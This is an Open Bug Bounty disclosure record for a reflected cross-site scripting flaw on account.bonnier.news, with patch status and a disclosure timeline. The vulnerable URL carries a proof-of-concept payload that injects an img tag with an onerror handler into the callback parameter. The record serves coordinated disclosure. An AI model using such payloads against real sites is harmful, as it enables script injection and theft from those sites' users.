account.bonnier.news XSS vulnerability

2016-06-13T16:26:00
ID OBB:159083
Type openbugbounty
Reporter hackingforbeer
Modified 2018-01-14T05:09:00

Description

Vulnerable URL:
https://account.bonnier.news/bip/login?appId=dagensnyheter.se&lc;=sv&state;=d8b87dc2-9ab2-4c7c-9d63-ba1853495f29&callback;=https://auth.dn.se/security/bip-authenticated%22/%3E%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&reqId;=0V0CEVazFqIzMjfvk7U9d3
Details:

Description| Value
---|---
Patched:| Yes, at 13.01.2018
Latest check for patch:| 13.01.2018 13:53 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check account.bonnier.news SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 June, 2016 16:26 GMT
Generic security notifications sent to website owner| 13 June, 2016 16:28 GMT
Customized security notification sent to website owner| 13 June, 2016 16:28 GMT
Vulnerability details disclosed by researcher| 5 September, 2016 17:12 GMT
Vulnerability patched by the website owner| 14 January, 2018 05:09 GMT